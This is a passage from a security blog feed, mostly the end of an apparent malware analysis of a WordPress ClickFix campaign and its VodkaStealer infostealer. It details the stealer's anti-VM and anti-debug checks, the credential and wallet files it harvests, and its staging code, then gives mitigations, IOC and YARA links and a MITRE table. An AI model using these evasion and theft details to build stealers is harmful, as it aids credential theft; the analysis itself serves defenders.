			raise ValueError(f"Character {e.args[0]!r} not in alphabet") from None

		v = n0 | (n1 &lt;&lt; 4) | (n2 &lt;&lt; 8) | (n3 &lt;&lt; 12)
        ch = (v ^ key ^ (i * 7)) & 0xFFFF
		out.append(chr(ch))

	return "".join(out)</pre><p><span style='font-size: undefined;'>As with Vidar, we share a </span><a href="https://github.com/rapid7/Rapid7-Labs/blob/main/Malware%20Config%20Extractors/impure_stealer_extract.py" target="_blank"><span style='font-size: undefined;'>public script</span></a><span style='font-size: undefined;'> to extract decrypted strings and any C2 configuration contained therein from the stealer samples.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>VodkaStealer</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The latest payload observed at the end of the DoubleDonut chain is a new custom C++ stealer, which has been named VodkaStealer and </span><a href="https://xto9ot.gitbook.io/malware-analysis/clickfix-campaign-russian-threat-actor-evolves-to-custom-infostealer" target="_blank"><span style='font-size: undefined;'>first analyzed by researcher xto9ot</span></a><span style='font-size: undefined;'>. This stealer can confidently be attributed to the developer of the DoubleDonut loader due to many overlapping characteristics of both binaries, such as the exact same mechanism for downloading and injecting additional payloads into other service host processes, as well as reuse of DoubleDonut C2 infrastructure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Compared to the previous payloads, including Vidar and Impure Stealer, as well as StealC, Rhadamanthys, and AuraStealer — which have been observed delivered in the same campaign by researchers at </span><a href="https://www.levelblue.com/blogs/spiderlabs-blog/how-clickfix-opens-the-door-to-stealthy-stealc-information-stealer" target="_blank"><span style='font-size: undefined;'>LevelBlue</span></a><span style='font-size: undefined;'> and </span><a href="https://www.intrinsec.com/wp-content/uploads/2026/02/TLP-CLEAR-AuraStealer-EN.pdf" target="_blank"><span style='font-size: undefined;'>Intrinsec</span></a><span style='font-size: undefined;'> — the new stealer lacks significantly in anti-analysis and stealth capabilities, missing out on any kind of binary obfuscation, and staging temporary files to disk, in plaintext and with fully descriptive filenames, before exfiltration. Furthermore, in order to bypass Chrome v20 App-Bound Encryption, the stealer tries to download and run a separate helper binary, the open-source “ChromElevator” tool (source code is found on </span><a href="https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption" target="_blank"><span style='font-size: undefined;'>GitHub</span></a><span style='font-size: undefined;'>), hosted on the same C2 server as the loader shellcode.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This begs the question why an attacker with access to the latest cutting-edge infostealers would fall back to a custom stealer written potentially from scratch. One speculative explanation is of an economical nature — commercial infostealers are expensive, while small software PoC development, including malware development, is becoming widely available thanks to pre-trained transformer LLMs, with open-source “red team” tools like ChromElevator available to aid with the more technically challenging aspects. However, this is all pure speculation, and Rapid7 Labs will keep tracking the campaign to collect more intelligence and draw more definitive conclusions.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As is the case with practically all commodity infostealers, the sample starts by checking if any of the enabled keyboard layouts match the Russian language, and if the public IP of the infected machine suggests location within Russia or Belarus. In these cases, the malware terminates.</span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltef9ed65e5a986e5f/69af1c56f2eef0000852634a/08-vodka-geocheck.png" alt="08-vodka-geocheck.png" caption="Figure 17: Code listing from the WinMain function illustrates geographical checks." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="08-vodka-geocheck.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltef9ed65e5a986e5f/69af1c56f2eef0000852634a/08-vodka-geocheck.png" data-sys-asset-uid="bltef9ed65e5a986e5f" data-sys-asset-filename="08-vodka-geocheck.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 17: Code listing from the WinMain function illustrates geographical checks." data-sys-asset-alt="08-vodka-geocheck.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 17: Code listing from the WinMain function illustrates geographical checks.</figcaption></div></figure><p>⠀</p><p><span style='font-size: undefined;'>Next, the stealer checks if either the file </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>%Temp%\sysinfo_user_marker.marker</span></span><span style='font-size: undefined;'> or the mutex </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Global\sysinfo_single_instance</span></span><span style='font-size: undefined;'> exists, and if so, terminates execution. An anti-debug check is performed by calling </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>IsDebuggerPresent</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>CheckRemoteDebuggerPresent</span></span><span style='font-size: undefined;'>, a combination of </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Sleep</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>GetTickCount</span></span><span style='font-size: undefined;'>, as well as querying the registry for presence of the following keys:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HKLM\SOFTWARE\VMware, Inc.\VMware Tools</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HKLM\SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HKLM\SYSTEM\CurrentControlSet\Services\VBoxGuest</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HKLM\SYSTEM\CurrentControlSet\Services\vmci</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>HKLM\SYSTEM\CurrentControlSet\Services\vmmouse</span></span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Lastly, a process snapshot is taken and scanned for the following blacklisted process names: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vmtoolsd.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vmwareuser.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vmwaretray.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vmware-vmx.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vboxservice.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vboxtray.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vboxdisp.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vboxguest.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vgauthservice.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vmwareauthd.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>sbiesvc.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>sbiecnt.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>sandboxiedcomlaunch.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>qemu-ga.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>xenservice.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vmsrvc.exe</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>vmusrvc.exe</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Following a successful anti-debug scan, the malware queries up to 8 different browser data locations in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>%AppData%</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>%LocalAppData%</span></span><span style='font-size: undefined;'>, targeting Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, and Chromium browsers, and kills all processes matching any of these browsers’ executable names.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Then, various pieces of system information are collected and a directory is created according to this format:</span></p><pre language="cpp">wsprintfA(PathName,
"%s\\sysinfo_%s_%s_%02d%02d%04d%02d%02d",
        temp_dir_path,
        ipinfo_country_code,
        ipinfo_query,
        SystemTime.wDay,
        SystemTime.wMonth,
        SystemTime.wYear,
        SystemTime.wHour,
        SystemTime.wMinute);
CreateDirectoryA(PathName, 0);</pre><p><span style='font-size: undefined;'>The stealer then performs the main data collection:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>A list of installed software packages, obtained from standard </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Uninstall</span></span><span style='font-size: undefined;'> registry keys, is written into a file </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>InstalledSoftware.txt</span></span><span style='font-size: undefined;'> in the staging directory,</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Files from wallet- and extension-specific directories in all browser data directories are collected (using a hardcoded list of targeted wallet and extension IDs),</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>A screenshot is taken and saved, using the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>GetDC</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>BitBlt</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>GdipSaveImageToFile</span></span><span style='font-size: undefined;'> APIs from </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>gdiplus.dll</span></span><span style='font-size: undefined;'>,</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>If any encryption-enabled browser (e.g. Chrome) is installed:</span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>chromelevator.bin</span></span><span style='font-size: undefined;'> is downloaded from the loader C2 as described before and injected into </span><span style='font-size: undefined;'><em>another</em></span><span style='font-size: undefined;'> hijacked native </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>svchost.exe</span></span><span style='font-size: undefined;'> process using the same mechanism seen in the DoubleDonut loader,</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Once the remote thread finishes execution, files from </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>%Temp%\chromelevator_output</span></span><span style='font-size: undefined;'> are moved to the staging directory;</span></p></li></ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>If any non-encryption-enabled browser (e.g. Firefox) is installed:</span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Its </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>logins.json</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>cookies.sqlite</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>key4.db</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>cert9.db</span></span><span style='font-size: undefined;'> files are staged;</span></p></li></ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>AppData files from the following natively installed applications are collected:</span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>FileZilla, OpenVPN Connect, Exodus, Electrum, Jaxx, Guarda, Ledger Live, Ledger Wallet, Trezor, Bitcoin, Coinomi, Litecoin;</span></p></li></ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>System information is collected into a file named </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>systeminfo.txt</span></span><span style='font-size: undefined;'> inside the staging directory.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>One thing both the threat actor and previous analyses missed is that the injection of ChromElevator into the target service host process is currently broken and will silently fail. Because we feel no need to help the actor fix their mistake, we will not describe why this is the case. However, it may be that the threat actor has already noticed the missing functionality around February 22, when the ClickFix injection scripts described before suddenly seem to have been temporarily disabled — the infected websites still load the injector script from either the 3rd-party JavaScript host server or their own </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>admin-ajax.php</span></span><span style='font-size: undefined;'>, but the response is empty.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Because VodkaStealer does not perform any string encryption in its payloads, the C2 IP address can be extracted directly from the unpacked sample. Besides C2 information, we’re unaware of any additional configuration shipped with the stealer, but this may be simply because the malware is still in early stages of development.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>It remains unclear by what means the attackers are compromising the targeted WordPress websites. The most likely scenarios include either a WordPress plugin or theme vulnerability being exploited, previously stolen credentials being misused, or potentially even publicly accessible wp-admin interfaces — which have been observed on most of the compromised websites — being accessed through a brute-force password spraying attack. Keeping these scenarios in mind, we urge WordPress site administrators to:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Regularly review all software components for outdated versions and perform vulnerability scans to identify and mitigate weaknesses,</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Use long and unpredictable passwords for administrative access, possibly using a password manager for audited security and convenience,</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Set up a second authentication factor for administrative access,</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Avoid running untrusted code on devices that store credentials (e.g. saved logins in a browser) usable to administer the website.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The best defense for individuals browsing the web is to stay cautious, maintain a zero-trust mindset, use reputable security software, and keep themselves up to date with the latest phishing and ClickFix tactics used by malicious actors. An important takeaway from this report should be that </span><span style='font-size: undefined;'><strong>even trusted websites can be compromised</strong></span><span style='font-size: undefined;'> and weaponised against unsuspecting visitors.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>An additional precaution that can be effective on Windows systems is disabling the Run dialog shortcut (Windows Key+R); however, this will not prevent malicious commands from being pasted into a terminal or a Windows Explorer location bar (cf. </span><span style='font-size: undefined;'><em>FileFix</em></span><span style='font-size: undefined;'> attack).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To help defenders mitigate this threat in their organization, we provide an extensive list of IoCs and a set of detection rules further below.</span></p><h2>Conclusion</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Social engineering remains one of the most effective initial access tactics used by threat actors. The ClickFix campaign described in this blog illustrates just how easily unsuspecting users can be tricked into having their credentials stolen and exfiltrated to an attacker during perfectly ordinary web browsing. Without the victim even noticing that a compromise took place, their credentials can subsequently be misused for impersonation, further access to company resources, financial theft, or even to spread the social engineering lures to an even wider audience.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The large-scale execution of the compromise across completely unrelated WordPress instances suggests a high level of automation by the threat actor and is likely part of an organized long-term criminal effort. Despite this, the technical and operational sophistication of the campaign is limited and we provide a comprehensive technical breakdown of the infection chain, as well as a set of detection rules to defend against this threat in depth.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Want to learn more? </strong></span><a href="https://www.brighttalk.com/webcast/10457/664168?utm_source=Rapid7&amp;utm_medium=brighttalk&amp;utm_campaign=664168?utm_source=brighttalk&amp;utm_medium=blog&amp;utm_content=blog-cta&amp;utm_campaign=global-pla-q1-2026-exploiting-trust-at-scale-webinar-prospect-eng"><span style='font-size: undefined;'><strong>Watch the webinar here.</strong></span></a></p><h2 style="direction: ltr;">Indicators of Compromise (IOCs)</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The complete list of IOCs for this campaign is found in our public GitHub repository: </span><a href="https://github.com/rapid7/Rapid7-Labs/blob/main/IOCs/ClickFix_DoubleDonut_Campaign_IOCs.txt" target="_blank"><span style='font-size: undefined;'>ClickFix_DoubleDonut_Campaign_IOCs.txt</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">YARA Detection Rules</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The detection rules for this campaign are found in our public GitHub repository: </span><a href="https://github.com/rapid7/Rapid7-Labs/blob/main/Yara/ClickFix_DoubleDonut_Campaign.yar" target="_blank"><span style='font-size: undefined;'>ClickFix_DoubleDonut_Campaign.yar</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">MITRE ATT&CK Techniques</h2><p></p><table><colgroup data-width='750'><col style="width:15.670800450958286%"/><col style="width:55.01691093573844%"/><col style="width:29.312288613303267%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'>ID</span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'>Name</span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'>Specifically Relates To</span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1583.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Acquire Infrastructure: Domains</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1584.006</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Compromise Infrastructure: Web Services</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1587.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Develop Capabilities: Malware</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>DoubleDonut Loader, VodkaStealer</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1588.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Obtain Capabilities: Malware</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Vidar Stealer, Donut Loader</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1608.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Stage Capabilities: Upload Malware</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1608.004</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Stage Capabilities: Drive-by Target</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1189</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Drive-by Compromise</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1059.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Command and Scripting Interpreter: PowerShell</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1204.004</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>User Execution: Malicious Copy and Paste</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1622</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Debugger Evasion</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1140</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Deobfuscate/Decode Files or Information</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1027.002</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Obfuscated Files or Information: Software Packing</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Donut Loader</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1027.007</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Obfuscated Files or Information: Dynamic API Resolution</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Donut Loader, Vidar Stealer</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1027.013</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Obfuscated Files or Information: Encrypted/Encoded File</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1055</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Process Injection</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Donut Loader</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1620</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Reflective Code Loading</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Donut Loader</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1497.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Virtualization/Sandbox Evasion: System Checks</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>VodkaStealer</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1497.003</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Virtualization/Sandbox Evasion: Time Based Checks</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>VodkaStealer</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1555</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Credentials from Password Stores</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1555.003</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Credentials from Password Stores: Credentials from Web Browsers</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1539</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Steal Web Session Cookie</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1552</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Unsecured Credentials</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1071.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Application Layer Protocol: Web Protocols</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1132.002</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Data Encoding: Non-Standard Encoding</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Impure Stealer</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1573.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Encrypted Channel: Symmetric Cryptography</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Impure Stealer, VodkaStealer</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1104</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Multi-Stage Channels</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1095</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Non-Application Layer Protocol</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Impure Stealer, VodkaStealer</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1571</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Non-Standard Port</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Impure Stealer, VodkaStealer</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1102.001</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Web Service: Dead Drop Resolver</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Vidar Stealer</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>T1041</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Exfiltration Over C2 Channel</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>-</span></p></td></tr></tbody></table>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-malicious-websites-wordpress-compromise-advances-global-stealer-operation</link>
      <guid isPermaLink="false">blt04cfd26c14e2d4fa</guid>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Milan Spinka]]></dc:creator>
      <pubDate>Tue, 10 Mar 2026 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf3ae6fb8e07d88e0/67ee88468d0b99031be0ea84/resources-research.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Before the Breach: When digital footprints become a strategic cyber risk]]></title>
      <description><![CDATA[<h2><span style='font-size: undefined;'>Overview</span></h2><p><span style='font-size: undefined;'>For years, organizations have prioritized strengthening technical defenses, including hardening networks, accelerating patch management, and expanding endpoint detection and response capabilities. Defensive systems have become more adaptive, identity has moved to the center of security architectures, and zero-trust has emerged as a foundational design principle. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Despite these advances, successful intrusions continue to occur in environments that appear technically mature. While traditional attack vectors like vulnerability exploitation, misconfigurations, and malware-based intrusions show no sign of decline, modern attacks are increasingly preceded or materially enabled by extensive reconnaissance conducted beyond the victim’s technical perimeter.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations and their employees expose substantial volumes of data online, both intentionally and unintentionally. This includes professional and personal information shared through corporate websites, SaaS platforms, social media, developer repositories, marketing materials, and third-party services, as well as data exposed through breaches, misconfigured cloud assets, and shadow IT.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As seen in the following screenshots, vast amounts of historical information, credential leaks, personally identifiable information (PII) persist in exposed databases, as well as on dark web marketplaces and cybercrime forums.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt935226c625c75a2d/69a04867d5b2d260bc74fe1f/dark-web-marketplace-US-SSNs-sale.png" alt="dark-web-marketplace-US-SSNs-sale.png" caption="Figure 1: A dark web marketplace offering US SSNs for sale." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="dark-web-marketplace-US-SSNs-sale.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt935226c625c75a2d/69a04867d5b2d260bc74fe1f/dark-web-marketplace-US-SSNs-sale.png" data-sys-asset-uid="blt935226c625c75a2d" data-sys-asset-filename="dark-web-marketplace-US-SSNs-sale.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: A dark web marketplace offering US SSNs for sale." data-sys-asset-alt="dark-web-marketplace-US-SSNs-sale.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1: A dark web marketplace offering US SSNs for sale.</figcaption></div></figure><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt211adc3b079d8f80/69a04867e8d8db5e94f1c3a9/compromised-database-search-engine-exposes-leaked-credentials.png" alt="compromised-database-search-engine-exposes-leaked-credentials.png" caption="Figure 2: A compromised database search engine exposes leaked credentials." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="compromised-database-search-engine-exposes-leaked-credentials.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt211adc3b079d8f80/69a04867e8d8db5e94f1c3a9/compromised-database-search-engine-exposes-leaked-credentials.png" 